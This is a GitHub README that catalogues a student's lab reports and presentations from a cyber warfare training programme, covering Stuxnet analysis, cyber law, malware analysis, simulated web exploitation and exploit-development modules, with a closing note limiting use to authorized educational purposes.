This Repository covers lab projects I have submitted as part of the International Cybersecurity and Digital Forensic Academy (ICDFA) Advanced Cyber Warfare Programme
🔗 Documentation: GitHub; YouTube
The ACW801 folder is a comprehensive collection of research, strategic analysis, and policy recommendations focused on cyber warfare, offensive cyber operations, and international cyber law. As part of the ICDFA Advanced Cyberwarfare Program, these reports provide in-depth technical, geopolitical, and legal insights into modern cyber conflicts. It includes the following resources
📄 1: Dissecting Stuxnet - Anatomy of a Cyber Weapon
📄 2: Strategic Cyber Operation Report - Operation Shadow Strike; PowerPoint: Operation Shadow Strike
📄 3: International Cyber Warfare Laws & Ethics
📄 Policy Memo: Preventing Future Cyber Weapons Escalation
The ACW802 directory contains hands-on lab documentation and practical exercises, focusing on offensive cybersecurity operations and malware analysis environments. The labs are designed to simulate real-world attack scenarios and prepare environments for advanced threat analysis and penetration testing.
📄 ACW802_OperationShadowStrike, YouTube
📄 ACW802_FlareVM_SetUp, YouTube
📄 ACW803_Dynamic Malware Analysis: Behavioral Profiling of a Suspicious Executable, YouTube
Operation Blacktrace investigates a stealthy breach at ICDFA’s internal network, where a malicious PACP (Packet Capture) file redirected internal traffic to an attacker-controlled server. The attacker exfiltrated data, escalated privileges using stolen credentials, and conducted internal reconnaissance without deploying malware. This case underscores the risks of fileless attacks and highlights the need for network segmentation, anomaly-based detection, and hardened proxy configurations.
📄 ACW803_Operation Blacktrace, YouTube
This strategic lab assesses the national security risks of cyberattacks on critical infrastructure (CI), including energy grids, healthcare systems, and financial networks. It explores nation-state motivations, real-world attacks like Industroyer2, and outlines a comprehensive resilience framework. The document emphasizes Zero Trust, threat modeling, OT security, cross-sector collaboration, and rapid response capabilities to defend against state-sponsored campaigns.
📄 ACW804_CyberWarfare in Crititical Infrastructure
This module delivers a comprehensive assessment of cyber warfare strategies, operational tactics, and their implications in modern defense and national security. The content includes a detailed written report and presentation slides, covering threat actor profiling, operational impact forecasting, and resilience recommendations. Designed for both strategic planners and cybersecurity practitioners, ACW901 bridges theoretical frameworks with real-world case studies to enhance understanding of cyber operations in conflict scenarios.
📄 ACW901_CyberWarfare_Analysis Report
📄 Slides for ACW901_CyberWarfare_Analysis
This lab simulates a nation-state-level cyber operation targeting the OPSPORTAL v2.1.4 logistics command system. Through advanced web exploitation, including SQL Injection and misconfiguration analysis, the assessment uncovered critical vulnerabilities leading to credential leaks, exposed cryptographic keys, and database compromise. The exercise demonstrates real-world APT methodologies spanning reconnaissance, exploitation, and data exfiltration while providing key defensive recommendations to strengthen national-level cyber resilience and critical infrastructure protection.
📄 ACW902_- Operation BLACK FOG
ACW903 examines the full exploit-development lifecycle: from fuzzing and crash triage to PoC creation, payload construction, and advanced bypasses (ROP/ret2libc) used to defeat DEP/NX and ASLR. The module blends hands-on techniques with real-world case studies (EternalBlue, Baron Samedit) to show how multiple bugs are chained into reliable exploits and what defenders must do—patching, memory hardening, EDR and layered mitigations—to raise the attacker’s cost.
📄 ACW903: Weaponizing Vulnerabilities - Exploit Development
📄 Slides for ACW903: Weaponizing Vulnerabilities - Exploit Development
Operation AEGIS SHIELD simulates a full-scale defensive cyber operation under live adversary conditions, focusing on real-time command decision-making, containment, and intelligence escalation. The exercise follows the cyber kill chain from delivery to command-and-control, detailing the defense against the IRON VORTEX threat group’s attempted intrusion on the POSEIDON Maritime Logistics Network. Through structured injects, forensic response, and situational reporting, the module highlights the integration of active defense, evidence preservation, and operational leadership within a nation-state cyber defense framework.
📄ACW904 – Operation AEGIS SHIELD
These labs are part of the International Cybersecurity and Digital Forensic Academy (ICDFA) Advanced Cyber Warfare Programme. These materials are intended for educational and defensive purposes only. By using them you agree to abide by applicable laws and institutional policies. Do not use the techniques on systems you do not own or have explicit authorization to test. Contributions, issue reports, and enhancements are welcome through pull requests.
For inquiries or discussions, feel free to reach out via LinkedIn | GitHub | Medium | YouTube.